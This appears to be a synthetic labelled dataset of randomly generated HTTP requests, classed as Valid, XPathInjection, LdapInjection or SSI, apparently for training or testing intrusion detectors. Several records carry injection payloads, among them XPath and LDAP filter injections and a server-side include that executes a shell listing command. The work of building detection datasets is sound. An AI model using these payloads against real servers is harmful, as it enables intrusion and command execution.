X-Forwarded-For: 195.79.63.112
X-Serial-Number: 6969445752998
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48826
Start - Id: 48546
class: XPathInjection
PUT /ntaeapi/nmidcndnrSIspc3y/fRtBsaZTOTzvAOPMs/icAr5aacl/e8vK10h@pUtKISTL/Nifs/cmdHasr73zjTBJJF/oGPCY2/T.usrgY/FsoBvctt/oUqPyg.css? HTTP/1.1
Content-Length: 339
Content-Language: h,s,t6tj
Content-Encoding: identity
Content-Location: /e1znSbAE/btiis.jpg
Content-MD5: YzlzdGo0ZWppemlyTHM2cw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 01 Jan 10 09:24:31 UTC
Last-Modified: Sun, 11 Mar 07 19:53:16 GMT
Host: 199.143.32.88:69881
Connection: eucatT
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: 4fch-wubwy8, eeiwiusc-herpdomL, l-AToys, hPysp-urt4mTde, rht-mCNr;q=0.2
Cache-Control: 0i9qwl=acSseene
Client-ip: 220.175.249.82
Cookie: tvl9ed19poeuh2O=hbsTtGhtsUhEsef
Cookie2: $Version="4"
Date: Sun, 15 Jul 07 05:37:29 CET
ETag: W/"9a.@kRmZK0277p2HO0wo"
Expect: wnoeeHd
From: 5lotN@aerqwne.st
If-Modified-Since: Fri, 05 Dec 08 10:19:32 GMT
If-Unmodified-Since: Mon, 09 Feb 04 24:32:05 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 750
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: rOl0ta 9ssa=Epiteonc
Authorization: NTLM dE5kYWF6dGFzZmlvdWJzQk9MbzNvZW42d3Ryc21iZXQ=
Range: -3
Referer: /4alje.jsp
TE: deflate
Trailer: Max-Forwards
User-Agent: Mozilla/6.4 (X11; U; SunOS sun4u 9.8; rc-wD; rv:8.9.1) Gecko/73980654
UA-CPU: StrongARM
UA-Disp: 8426,8051,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 429x1759
Via: 7.2 39.84.38.217, FTP/5.2 29.128.45.126, 3.7 180.221.76.228
Transfer-Encoding: compress
Warning: 055 209.226.85.199:70292 "mEpIrti5alp3ed" "Wed, 13 Sep 06 22:52:18 CET"
X-Forwarded-For: 252.38.234.200
X-Serial-Number: 63432598525498098
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

dn=update6&BwSh=zrl&rgP8xk1s=rnunEbuE&nl=snAn&hwot=in4nf&RP@_JP-tdselectp=~ns9/l6a7iB&I6qEYP=4257&i9olagh=ztta0pni&pICzrrmhvOF_u=wItpRI0a mwa?s &Liaia=nieh3xi4&shesdf=pdsm&twesetopdanOo=as8awexzfntue4rreb&eulu3i=3616990025&dit7teo2=729  or  3/lb/ehdera/child::node()[position()=27]  or    513=&eImerailg8=27

End - Id: 48546
Start - Id: 2668
class: Valid
GET /stietnbtnlseatqmoi0a.jsp?MDvmqBAlike8=5y%40y6y7&2tmz3aaNdssamt=0998884&t3ttnlecw=dc0lio+izvai&EaddraecaydeAis=1700&Pnull_Nqyiframeform.=5083&FBlCSwp-8Bc=execihUarvodebhf%25&rtelss6x1ldg=3874367&sem3eaimlofau=nX2B70-&thaTe1heePrh=4907&tasF=itNhtOieionk0 HTTP/1.1
Host: www.Ixrdsw.cz
Connection: close
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: identity, identity;q=0.3, compress, compress;q=0.9, compress;q=0.9
Accept-Language: *
Cache-Control: no-cache
Client-ip: 97.1.7.203
Cookie: vGf9hzosct=iyrntg;8MUF=mstqahs5i+2;due32eidtSe=rtevalewgetkE?msaeht&tchildIt ;3swa=be;tiOscriptU3FPf=4407217;ncvSTk@g@@W=scy=a
Cookie2: $Version="737"
Date: Tue, 31 Jul 07 10:40:26 UTC
ETag: W/"YgfCl574zFZDDyBiItIN"
Expect: erRtfmbi=aeptu
From: ovamHuqy@MlywzI.fr
If-Modified-Since: Wed, 29 Oct 08 10:32:05 UTC
If-Unmodified-Since: Thu, 19 Apr 07 19:50:00 GMT
If-Match: "RFAgjj0sxyNuAhH.JE"
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: NTLM OWRlTmFlb25Bb2hjZXRybXdmbG5laWcxZUNyaWxpb2U=
Range: -23,-6679
Referer: /rs5l.cgi
TE: deflate,chunked;q=0.0,chunked
Trailer: Accept-Charset
User-Agent: Mozilla/4.4 (Machintosh; U; PPC 1.0; nt-es; rv:4.9.9) Gecko/52795488
UA-CPU: StrongARM
UA-Disp: 6089,3163,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 486x934
Via: 1.8 www.aredte.htm, 1.6 www.2LdtrUEa.jpg, ttfk0Q/5.2 www.ahcHEs.jpeg
Transfer-Encoding: identity
Upgrade: dubal/9.7, rce/1.2
Warning: 749 www.okXda0.jpeg:63 "nQde" 
X-Forwarded-For: 196.188.242.124
X-Serial-Number: 8136074594585
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2668
Start - Id: 49960
class: XPathInjection
GET /s20MNgaA5-R/xaoy/ec9lbeymE/annsh/XD/VobjectJ8VQQF2/ron/eKN/hnc9nclfhooipn.swf?zoonQonwmeZtrnc=ea9ae%27++++or+++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D++or+++++%27elunqp9n%27+++%3D+++%27 HTTP/1.1
Host: 80.239.169.50
Connection: close
Accept: application/zip;q=0.5
Accept-Charset: x-mac-hebrew;q=0.9, x-mac-korean;q=0.0
Accept-Encoding: 
Accept-Language: b-Bem1c, o4msewE-v, Vdtrh-rtdeeera;q=0.0
Cache-Control: max-age=97309
Client-ip: 252.225.18.142
Cookie: eng9munpCcs2ao=s9dhUNlhW;uTetCtczrn=084043
Cookie2: $Version="7"
Date: Sat, 07 Nov 09 01:32:59 CET
ETag: W/"hQ4l.RD7dOpBmeEgodH"
Expect: 100-continue
From: ekeat@ojhpuenrL.gov
If-Modified-Since: Tue, 06 Feb 07 11:19:53 UTC
If-Unmodified-Since: Tue, 02 Mar 04 01:13:48 UTC
If-Match: "RWnmxSedGag5Mgh@YI"
If-None-Match: *
If-Range: *
Max-Forwards: 459
MIME-Version: 0.7
Pragma: wj='reioOri'
Proxy-Authorization: Digest username="eo31e"
Authorization: NTLM ZW50ZU9idGRtb295OW50eWFPeUp0MHRubXM3SHRzdXRic3Vybg==
Range: 88781-3
Referer: /55cseua/0a21ure/aaefve/e6et/lgbinE.htm
TE: trailers,chunked;q=0.1
Trailer: If-Match
User-Agent: Mozilla/9.8 (compatible; rlinoeed3; Open BSD i586; 0nrlbbkoby; lOojn)
UA-CPU: x86
UA-Disp: 5750,1984,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 207x5488
Via: 2.9 63.93.102.63
Transfer-Encoding: gzip
Upgrade: c6nsO/4.6
Warning: 631 www.reelek.js "sooCrilind" 
X-Forwarded-For: 199.10.120.226
X-Serial-Number: 84157643689
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 49960
Start - Id: 38511
class: LdapInjection
GET /vo/hnebztneaetes86e/4xK80a/ci1A@n8stgb/Si/ehg/OsahiO/ezwusawhieno/OqzconnectLd0Sb3yN./gBhwkO3q6i3Y2t@DhLTh/Ta90G.php3?iia1vitchee=%29+++%28%7C+++%28anehm%3Debeen*%29&nLean5=G&eoyeecee=sRt%299&thvpl=ewl&qouheinvwrsreoP=srqlalnctute5leqlf&openvBC8=cttrquAsae&Nwqy=forroNtrnrmrMu&CBftprK8KP0zx0=ep%25e&riyar7tbfnets=137&nen5Rnugz9=97756&0VEui=hv38ttrr+ehl%2F&caaseu0Hat=%3Dl+8tsc7oq%7E%2Ftw+aN%7Ei&dr=eKQm&hreE=4ei&49@Qy_5guWlsG=vp3nt HTTP/1.1
Host: www.mbdn.fr
Connection: keep-alive
Accept: image/png;q=0.2
Accept-Charset: windows-1253, iso-8859-8-i;q=0.6, iso-10646-ucs-2, x-mac-icelandic, euc-kr
Accept-Encoding: 
Accept-Language: ost8oies-eon
Cache-Control: no-transform
Client-ip: 83.3.20.105
Cookie: engl5sxa=cdnoOtelnetllswindow.openhu
Cookie2: $Version="388"
Date: Thu, 10 Jul 08 22:41:14 UTC
ETag: "qcoSX53foSbz95-5"
Expect: 100-continue
From: lscomkd@ophedlorn.cz
If-Modified-Since: Wed, 19 Aug 09 05:08:10 CET
If-Unmodified-Since: Fri, 20 Feb 09 11:23:30 CET
If-Match: "cca5.6ISIkjdZr8kIR"
If-None-Match: "4pDd-_01lkxR3kHvu1"
If-Range: "qN9HSGace9QIzq7r08zz"
Max-Forwards: 087
MIME-Version: 3.3
Pragma: demoo='iebdo'
Proxy-Authorization: Digest response="Fd6C0B3D3bd244b0cA2F85cC8f1AA3cb"
Authorization: NTLM OWhYczduY291cmthT2hTa3JvM3NoZW5vZVlycmtkdU9lZ3JlYWVxbm52
Range: -087,245-62681,-648438
Referer: /eo5k/tsnnRn/IcaIo/buuos.php3
TE: chunked,chunked
Trailer: Warning
User-Agent: hdhtle (itXREUCKvI; tU9wnu_)
UA-CPU: 68000
UA-Disp: 299,3970,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 877x552
Via: HTTP/0.1 www.xuhe.jpg
Transfer-Encoding: wh4ba; 5hvata=d6Yrorfa
Upgrade: liDg/6.9, m3r2/7.5
Warning: 474 3.199.185.32 "psgyu2iuh9p6t" "Wed, 30 Jul 08 06:32:37 UTC"
X-Forwarded-For: 172.88.16.189
X-Serial-Number: 30599
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38511
Start - Id: 1685
class: Valid
GET /nCD-t_W6Ry71Ygf6gy1/L8nrcnpioNl/Irnwfiwds5rerH.jpeg? HTTP/1.1
Host: 151.195.22.83
Connection: close
Accept: image/*
Accept-Charset: utf-8;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=4
Client-ip: 77.199.112.25
Cookie: 6@_Jwp-U5K=dNe;no6ctsr=usvleact;td4eo1e8galr4=DtetLSrhoa;IIa30=tese40hbhzwreucttc
Cookie2: $Version="36"
Date: Wed, 12 Mar 08 15:53:28 CET
ETag: W/"Guq8N-HdhkeH6XJ1-_"
Expect: oeontso=mhebs;aosd=0gc1px
From: iNaNl@nioce.ch
If-Modified-Since: Sat, 16 Oct 04 15:24:46 CET
If-Unmodified-Since: Fri, 17 Jun 05 11:37:22 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 05 Apr 06 08:32:33 UTC
Max-Forwards: 2
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Digest username="o3aarj"
Authorization: 8eme n6hfde4=ncmr
Range: 73-
Referer: http://staaia.org/0xno0ed/rnnwsnr.gz
TE: chunked,trailers,trailers
Trailer: Expect
User-Agent: Mozilla/0.4 (Machintosh; U; PPC 2.5; nw-sh; rv:2.0.2) Gecko/51191204
UA-CPU: StrongARM
UA-Disp: 1503,019,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 3865x207
Via: FTP/1.4 13.27.43.58, 1.1 78.92.97.26
Transfer-Encoding: identity
Upgrade: edsh/1.1, 0e3eaA/2.7, 9eisMe/2.7
Warning: 541 www.tsaq.css "udtierkfde3nlrocns" "Mon, 14 May 07 03:02:21 CET"
X-Forwarded-For: 111.79.187.206
X-Serial-Number: 3355979393710804862
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1685
Start - Id: 19384
class: Valid
GET /0lVZegbr4Nky.l/unsn3rt9banc94ssms/nullB0fLRepXhDE.jpeg?xehrhUmwo=3016 HTTP/1.1
Host: www.peqEbhsm.uk
Connection: keep-alive
Accept: video/mpeg, text/html;q=0.3, application/postscript
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 149.25.142.60
Cookie: nstdcgma=enn 4rtfpt0raT;Pee=e;LVAxtermbvarJP=ra;gzhzu=0wi
Cookie2: $Version="986"
Date: Fri, 07 Nov 08 04:21:55 CET
ETag: W/"vZR1Jh.YD21PM7J7KI"
Expect: 100-continue
From: hxnatei@dLeolra.de
If-Modified-Since: Mon, 22 Mar 10 17:40:10 UTC
If-Unmodified-Since: Tue, 02 Mar 04 18:20:12 GMT
If-Match: *
If-None-Match: "ctV5yGe7UyO8lirN"
If-Range: Sat, 13 May 06 23:41:51 GMT
Max-Forwards: 348
MIME-Version: 5.2
Pragma: Zdtata7r='0vscrX1c'
Proxy-Authorization: NTLM aW9jckVuZWh1OXRia2xPZWF0bm13cXRSM29nZXBBcnJaYXl3bFRuaGFhc2RwQW9h
Authorization: NTLM ZW5zcmlteWRsc2VnNGNlY2pvaXlvc25mdHRzaXNwZWF0cWRldG11bA==
Range: 424-5049
Referer: http://R1x2keh.gov/hhmsaute/un7s/urelalsc.asp
TE: deflate;q=0.9,gzip;q=0.1,trailers
Trailer: Accept-Language
User-Agent: aekutsilpklvecom9o
UA-CPU: x86
UA-Disp: 818,3466,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 810x5301
Via: 6.6 www.eiiFrge.png, 4.4 214.206.211.246
Transfer-Encoding: identity
Upgrade: rCtoOd/1.7, sri/6.5, kddsop/1.3, LOZg/6.8, enie/8.5
Warning: 635 251.21.60.46 "eet4onNtZipzEri" "Tue, 06 Mar 07 24:49:36 CET"
X-Forwarded-For: 247.91.86.17
X-Serial-Number: 7120439
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19384
Start - Id: 38743
class: LdapInjection
GET /HFl/qQwzp/1cbgsoundelocationma-.unionnk/nek/egVk244@M5jZ7HeCYqaD/ju2rneymue/u4o7paflM.pl?xhm=2602138&fwi4nhec0oumtOb=cma9perlr4Nopen+Aodep+N%26all8&Hhtacces2.G=hnion&eha6ydabaae=76536&qto=eheespsskm&eeudey6=huaa&iwhTsxa47HttnE=697&window.openpassthrubMBdxDGk20=447&toaugat=Rc&kvbetweenWN81htpassAi_=fho%29%28++++%7C+++%28el%3D*%29&iuKr=%5Dechor%27&Oirue9ce=varr-up+rcbyhWe8etC&IktoloEsNi8san5=8595971&qee=na8nercpsarTeleiea&rOhfSNGswjst=he HTTP/1.0
Host: 167.230.97.148
Connection: keep-alive
Accept: */*
Accept-Charset: euc-jp, iso-8859-7
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 138.65.107.125
Cookie: 2r5hTtnr=0905761;droptju=t7b_cO
Cookie2: $Version="026"
Date: Mon, 28 Mar 05 24:11:18 GMT
ETag: W/"e8ISoAtba4-kVYA"
Expect: fiS4=nShE;sqrii=ejdS6owa
From: Dddcd@u4uew8d4.be
If-Modified-Since: Fri, 06 Apr 07 19:14:57 CET
If-Unmodified-Since: Sat, 29 Nov 08 18:08:10 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 30 Aug 07 23:10:26 CET
Max-Forwards: 27
MIME-Version: 3.6
Pragma: soh4ba=les8bnL
Proxy-Authorization: Basic eVRzbllhY2U6aXN0bw==
Authorization: NTLM c3VyaWFnYnZpZm9lYXRsVGxyZWtsZXJoeWNob2hscXBpaDduaWll
Range: 6-630560,55-36780
Referer: /sv9e/yongl/6oRllt26.js
TE: trailers,deflate,trailers
Trailer: If-Range
User-Agent: shnerhenn/5.0
UA-CPU: MIPS
UA-Disp: 495,5054,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 479x813
Via: FTP/9.8 www.cntw.js
Transfer-Encoding: diAUz; vhlate=t5Eee
Upgrade: dEii/5.0, tdxit/7.6, ieed/6.6, lZat/6.5, ogl/2.1
Warning: 815 www.sni22ed.shtml "iihdw6iguibnuR" 
X-Forwarded-For: 205.210.81.15
X-Serial-Number: 91445747246733
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38743
Start - Id: 17676
class: Valid
GET /WchildoeaWAm/ho8Adnspksu/nPDjsGyLHD76.G-h.OD/h0sWTdF3I9XlC5Wdm./aN1/d1s2Z-/tkuEw1OWVK8/cU/nqslkoJ/ozU2.tiff?34as2aj=969100&diwmeLmoniane=t%7El+&a4togYhcptzh=etREY96LfG&mttdeoit=hogaxZ%40epJ38&ne7euv=%2Fuz+ea HTTP/1.0
Host: 160.234.109.61
Connection: eyeioUop
Accept: application/*, text/html;q=0.6, video/mpeg
Accept-Charset: x-mac-roman, isiri-3342, windows-1257, iso-8859-1
Accept-Encoding: *;q=0.4
Accept-Language: neei-1aU6o, d4-n9e;q=0.5
Cache-Control: no-store
Client-ip: 230.206.198.120
Cookie: the2=tgcseohazniogjg9h;Beval_BqBmS3likej=hhTmuhnh;ts6eBh9d9= arsbineeWm1eovhpe;dihnq5=etw3w6abun0citdiOl
Cookie2: $Version="06"
Date: Tue, 13 Feb 07 01:15:55 UTC
ETag: "w3D25KVVt4PU3k45y0kF"
Expect: adoelhJ9=ha5n;bu1yaaq5=otenea
From: ham2@rhhtcs.de
If-Modified-Since: Wed, 19 Dec 07 19:47:53 GMT
If-Unmodified-Since: Thu, 27 Jan 05 18:01:27 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 20 Oct 07 06:51:25 GMT
Max-Forwards: 12
MIME-Version: 5.6
Pragma: rioxw=hmetd
Proxy-Authorization: 4orn qOhgtO=yrghen6n
Authorization: Basic c290ZHNoVGc6ZXJ5Y3Rw
Range: 0-,07-
Referer: /fduat/Whj8ht/ikye/6ESee.avi
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/7.9 (X11; U; Solaris 9.5; tS-ml; rv:1.9.9) Gecko/12057968
UA-CPU: Sparc
UA-Disp: 3353,591,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 5218x1595
Via: mmls/7.0 85.185.6.117, 2.7 www.oqju4.html
Transfer-Encoding: compress
Upgrade: 4rd/7.7, enhn/4.6, cfe/5.9
Warning: 607 www.ab3E5tss.png "3i5gweeoi8uw5re" 
X-Forwarded-For: 255.19.115.5
X-Serial-Number: 6572400
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17676
Start - Id: 18682
class: Valid
GET /ohTneienepqu/kohengos9osenb9nng/ePwUNbnQs7p5h4rokW/omea/lpF9p_vz9x/F-nLoU4zUE5Dgroup by/rFh8RfrtoTDbU/shesif/tetegtb.sh?okinSwyvsdA=48&UpJ7=441730&M5UUAdbp=htpassoo40iens&hqir=%27onhylaesn3u&EaG5phpXNSFh=7to&eXw=tOiq&qerut7zV=2275649420&eleutgvmrDdrs=el&i8red05ei8H=wwrcTtHo&-IXUTUrcp0B=nDaWhsd18vfdeletez4&libewa0u=8eqQqlg5nllmr5e0n&pmbiee2i9sjui=2460016 HTTP/1.0
Host: 238.4.155.165
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: hnlncntj-rfae;q=0.2, ss-2dywed;q=0.5, bey-AgEpitk, ol-nt;q=0.0, in6uOd-Noee;q=0.1
Cache-Control: no-store
Client-ip: 121.201.44.25
Cookie: bf54Rn=mF7V;7Efre9ih1anhi=ct$;stteniisgxen1=aA(DegnEns
Cookie2: $Version="935"
Date: Fri, 05 Jan 07 17:53:20 UTC
ETag: W/"ggu9gMdUqC-aFo4c6PO"
Expect: jnmvkdoo
From: hloyosxc@tEpaaeg.de
If-Modified-Since: Sun, 27 Feb 05 03:23:27 CET
If-Unmodified-Since: Fri, 21 Oct 05 05:00:32 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 5.8
Pragma: n='t8'
Proxy-Authorization: sSOb one05bhe=dmn8
Authorization: dTts halt=zcHehncv
Range: -26
Referer: /g8co/imGqzoj/tsensL/rrjet.fgf
TE: deflate,gzip;q=0.1
Trailer: If-Match
User-Agent: adlszre6/4.7.6.2.0
UA-CPU: MIPS
UA-Disp: 8675,230,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 8595x9488
Via: 6.4 www.nyotsa.html:6805, 8et/8.4 243.182.159.207:7
Transfer-Encoding: deflate
Upgrade: Ctu57e/3.8, chee/8.1, lrvDmi/8.7, i9hei/6.7
Warning: 812 139.190.252.15 "nrMsnhsnn" "Mon, 06 Jul 09 11:19:51 GMT"
X-Forwarded-For: 241.151.124.130
X-Serial-Number: 04013
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18682
Start - Id: 6766
class: Valid
POST /DN5deOwlh/60ykQvtUCe8@3Cx.dll? HTTP/1.1
Content-Length: 10
Content-Language: 2bbcLenF,s,atI6dnj
Content-Encoding: gzip
Content-Location: http://www.pge8.org/laaGb/hrTM/pmwaboea/arlz7kt/5t18he.nsf
Content-MD5: aWVlZWRhQ3JzZWF0YTA1bg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 28 Jul 09 10:02:56 CET
Last-Modified: Tue, 12 Dec 06 14:44:36 CET
Host: www.eFtultew4e.uk
Connection: close
Accept: image/*
Accept-Charset: iso-8859-7;q=0.2, us-ascii;q=0.8, koi8;q=0.2, windows-1257
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: m1aer='fnxe'
Client-ip: 166.208.84.151
Cookie: wstgar=etcw;iusct=access_logi1https;Teh=88638
Cookie2: $Version="11"
Date: Mon, 17 Oct 05 01:59:37 UTC
ETag: W/"2OHyIFx6vyE_y4Nr"
Expect: netr=smijneen
From: i6Nyv@5oumwccEOt.be
If-Modified-Since: Sat, 07 Feb 09 12:17:35 CET
If-Unmodified-Since: Sun, 08 Mar 09 18:52:11 CET
If-Match: *
If-None-Match: "dyjco0bQxFe2uMpe@ee"
If-Range: Fri, 14 Dec 07 06:46:44 GMT
Max-Forwards: 926
MIME-Version: 4.3
Pragma: eolhC=8
Proxy-Authorization: Basic cnRyaDpudG5yZHdv
Authorization: ntrh m1bunu=u2inorn
Range: 56346-5
Referer: http://www.ryeFp.uk/canre/taue48hh.msf
TE: chunked,trailers
Trailer: Accept
User-Agent: hfhabhTstor
UA-CPU: StrongARM
UA-Disp: 342,103,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 3268x616
Via: HTTP/5.7 152.250.8.243:75808, HTTP/5.0 144.214.136.125, 1.2 61.114.194.174
Transfer-Encoding: gzip
Upgrade: rie/7.4, 5Iena/2.4, fuca/0.7
Warning: 686 27.211.29.45 "sijrpot" "Sat, 10 Jun 06 10:21:01 UTC"
X-Forwarded-For: 191.106.203.155
X-Serial-Number: 830725
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1ses=hvlgg

End - Id: 6766
Start - Id: 3976
class: Valid
POST /s7e/L0dWmetaIjautoexecnjl5Y/od3/x9SWhttp/rEvK0dyo/hilNrtii8pHjr4hshee/0LKD.EardWDfB/otvhHTL._3stHsWUr/etnSouhco/9KnF@.Mu2Lb/aJKOXTcmmFSzjpyHZEyz/ieysomX5pn2l0nkqny.html? HTTP/1.0
Content-Length: 190
Content-Language: befnmd5a,de,9enV
Content-Encoding: gzip
Content-Location: /sobseocr/axbpji7i/rTUdh.htm
Content-MD5: OHRBcGFzc29wbk54ZXVkYw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 04 Sep 09 12:59:40 GMT
Last-Modified: Fri, 20 Jan 06 15:01:16 CET
Host: www.enupelesc.cz:80
Connection: keep-alive
Accept: audio/*, audio/basic, image/*;q=0.0
Accept-Charset: *;q=0.1
Accept-Encoding: identity;q=0.0, deflate
Accept-Language: *;q=0.9
Cache-Control: max-stale
Client-ip: 0.203.100.90
Cookie: eYpcwkeShu=66ef;eIZDhF8=n0uoUjT2VR0;mtwt5ee6aAtN=-tnRw$ Ei;Tf7tncirnwlGgn=om
Cookie2: $Version="675"
Date: Fri, 23 Sep 05 20:37:52 UTC
ETag: W/"4E7uM_-UJAKSJ8CO"
Expect: 5dnhern=fet7
From: mdue@xtsaa.biz
If-Modified-Since: Tue, 17 Aug 04 14:13:09 GMT
If-Unmodified-Since: Sun, 24 Jul 05 20:32:18 CET
If-Match: *
If-None-Match: "DOc4TGxAUru1wyCBWcW"
If-Range: "ndmfM8QmIPQkE-SMx8"
Max-Forwards: 78
MIME-Version: 2.6
Pragma: dp=r
Proxy-Authorization: sMt2 aeatsne=apelon
Authorization: NTLM SXNtaGRoY3VlZGVybG9odWZpY2xpb2k2Y2hvb2VscWNhTDRkSFAxdFk0bW4=
Range: -1776
Referer: /paUnAEUo/t3abj/ezerur/dryqoatr/satab.tar
TE: trailers,gzip
Trailer: Trailer
User-Agent: eawersta/9.6.3.5
UA-CPU: Sparc
UA-Disp: 4256,175,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 881x617
Via: 6.9 221.135.102.217
Transfer-Encoding: compress
Upgrade: tnoc/2.8, twh/6.6, d0clah/7.2
Warning: 110 www.iota.png "rsgezsgtr6" 
X-Forwarded-For: 183.234.68.24
X-Serial-Number: 40666
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Eouerrie8Fres=sls7xtmp cW0&e7phntersr=6263933378&td7giie=ae$msi5atu0trS3&ilinihv=ieuxodycrnaoaa&ehs=ih&ae=iz1atoNacbwaa4&minsertL3ZErik.YV=eggrw$h&UhtteiAs=efJE9v_VOS&0rcp-ar7ShttpnV9V=d

End - Id: 3976
Start - Id: 39868
class: SSI
GET /efKCdGzO6.@ImnT0/duyEt/atH/xaam/eqtplsluttaej/p7vWXAQBg1/ef.APO1Af0mDjW4Oe/R6n@xyDvHiV/NcopyyqJ1ZNlXOIk2Y.png?tcAryanmcn=ha&tur=8045&ToNTz3bthlo=%3Bdrn8n+maoecho+%5C%24eoGs&nce=062916&ogiuolbItr=%2Betc&saoreef=698&dautoexecaaeJ=815801818&LTPJDcmd1B=urz.&ha=1G3e30hrHO2wt2&wLJMsock_streamI0hq=22 HTTP/1.1
Host: 84.251.189.8
Connection: close
Accept: image/jpeg;q=0.6, audio/*;q=0.9, text/*;q=0.9
Accept-Charset: windows-1251;q=0.4, windows-1257;q=0.7, iso-8859-8-i, x-mac-ce, windows-1252;q=0.6
Accept-Encoding: 
Accept-Language: o-tohnlPeq;q=0.9, Tes-worp;q=0.7, wb-faZatect;q=0.4, et-e;q=0.9
Cache-Control: min-fresh=92
Client-ip: 148.227.129.30
Cookie: ahi2l6089=oN cH ldtn+Rmu;adminIxvJHXK=ezP;ehirn=73
Cookie2: $Version="32"
Date: Sat, 05 Jun 04 03:27:19 UTC
ETag: "YiIMsANeiSV3D4fxFx8"
Expect: 100-continue
If-Modified-Since: Fri, 25 Apr 08 24:54:57 GMT
If-Unmodified-Since: Thu, 17 Aug 06 20:54:03 GMT
If-Match: "8Z_Zw.4@KHxQd2u7Va8"
If-None-Match: "7uGP4Wbo5qOOdM7.7_b"
If-Range: "dJi8haicSI1lPsKeU7"
Max-Forwards: 535
Pragma: drd='uJ'
Proxy-Authorization: NTLM ZW5zaThjY2RlZGx6Z0llaHBsaFN3MnJpbmhjdHRuaW5lZXl0cmhoaGg=
Authorization: Basic QWlFb3JhOmVjYTNo
Range: -18262
Referer: http://HeiAe2ee.cz/1yii/cecklb/ichn/IimdsTa/hlneuA.jpg
TE: trailers
Trailer: Accept
User-Agent: <!--  #exec cmd="/bin/ls     -l /home/eSmg/ra"   -->
UA-Disp: 928,3090,8
UA-OS: Win98
Via: wdiidu/8.4 www.eIhIn.tiff, HTTP/5.7 www.diod.shtml, FTP/3.6 168.184.182.113
Transfer-Encoding: compress
Upgrade: gtdie/3.7
Warning: 792 82.82.12.49 "ieyi" 
X-Forwarded-For: 37.56.79.152
X-Serial-Number: 197384667881
----: -----------------------------------

null

End - Id: 39868
Start - Id: 15013
class: Valid
GET /log7P6B8LsP/nOVpPIguByS/jI@R0AM.EcIS/NlrrhsgOhm4swr7vmus/aFWA3j4/aFZBIgK/t9C.php3?HQ7.M=i4 HTTP/1.1
Host: www.Lnrh.it
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 201.156.204.117
Cookie: pLee5i=0649
Cookie2: $Version="375"
Date: Mon, 11 Aug 08 23:04:52 UTC
ETag: W/"9EUgVOn_H3z1x0XTd"
Expect: ssjm=nnhs
From: emft@nUDA.it
If-Modified-Since: Wed, 14 Feb 07 06:26:15 UTC
If-Unmodified-Since: Tue, 01 Sep 09 21:41:00 GMT
If-Match: "vg51N_Hma.Rl.Q@Nmo"
If-None-Match: "l5ufZTNXoKKawnKmf"
If-Range: Sun, 13 Nov 05 16:56:27 UTC
Max-Forwards: 7
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: lers dEomna=enMS
Authorization: NTLM bGw3dHByZW9pdHRob2UwbjdoNGhlZG00Z3dlYWpFbmdpbnBobmg=
Range: -458527,888376-56056
Referer: http://s4nn.com/ba3dt/nezo70.pl
TE: chunked;q=0.5,deflate;q=0.6
Trailer: If-Unmodified-Since
User-Agent: eejHonuiee (sA6_9QUz_; 249c0L; sH_xoj)
UA-CPU: StrongARM
UA-Disp: 5420,670,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 7618x6392
